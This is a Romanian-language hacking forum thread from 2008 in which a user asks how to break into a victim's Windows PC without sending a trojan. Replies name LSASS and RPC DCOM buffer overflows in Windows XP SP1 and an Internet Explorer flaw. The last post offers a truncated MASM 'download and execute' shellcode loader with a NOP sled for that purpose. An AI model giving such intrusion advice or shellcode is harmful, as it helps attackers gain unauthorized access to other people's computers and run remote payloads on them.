H4e Posted February 11, 2008 Report Posted February 11, 2008 Am si eu o intrbare: Exista o metoda de a intra intrun PC fara sai trimitem victimei un server????Adik fara troieni k aia necesita server fara telnnet k shi ala necsita un port deschis deci trebuie sai trimitem cev victimei.Exista o metoda kre nu necesita asta?? Quote
moubik Posted February 11, 2008 Report Posted February 11, 2008 da, sa foloseasca linux, sa aiba portul deschis, fara parola pe root.tu ce crezi ?fa niste presupuneri. Quote
H4e Posted February 11, 2008 Author Report Posted February 11, 2008 K, exceptand linux p Windows se poate acelashi lucru?? Quote
virusz Posted February 11, 2008 Report Posted February 11, 2008 sunt nspe metode...depinde de sistemul de operare al victimei, sa zicem ca victima are os: winxp sp1 ,poti folosi Lsass buffer owerflow vuln, sau RPC Dcom, astea sunt 2 vulnerabilitati ale lui winxp ->sp1, sp2 e patched... sunt si alte exploituri dar nu sunt toate publicepoti folosi o vuln de IE care executa un anumit fisier...is mai multe metode .. sunt foarte vechi astea ce ti le-am spus si nu prea mai ai sanse sa te bucuri prea mult de ele!...bafta! Quote
SirGod Posted February 11, 2008 Report Posted February 11, 2008 foloseste exploitul asta de download&execute ...e in ASM ia un compilator ca MASM,TASM,FASM si altele..;Tiny Download&&Exec ShellCode codz czy 2007.6.1;header 163=61(16+8+9+(28))+95(68+27)+17;163+19=192comment % #--------------------------------------# # # Tiny Download&&Exec ShellCode--> # # # -->size 192 # # # 2007.06.01 # # codz: czy # # # www.ph4nt0m.org # # #------------------------------------------# #system :test on ie6+XPSP2/2003SP2/2kSP4%.586.model flat,stdcalloption casemap:noneinclude c:\masm32\include\windows.incinclude c:\masm32\include\kernel32.incincludelib c:\masm32\lib\kernel32.libinclude c:\masm32\include\user32.incincludelib c:\masm32\lib\user32.lib.datashelldatabuffer db 1024 dup(0)shellcodebuffer db 2046 dup(0)downshell db 'down exploit',0.codestart: invoke MessageBoxA,0,offset downshell,offset downshell,1 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256 mov eax,offset shellcodebuffer jmp eax somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h; Quote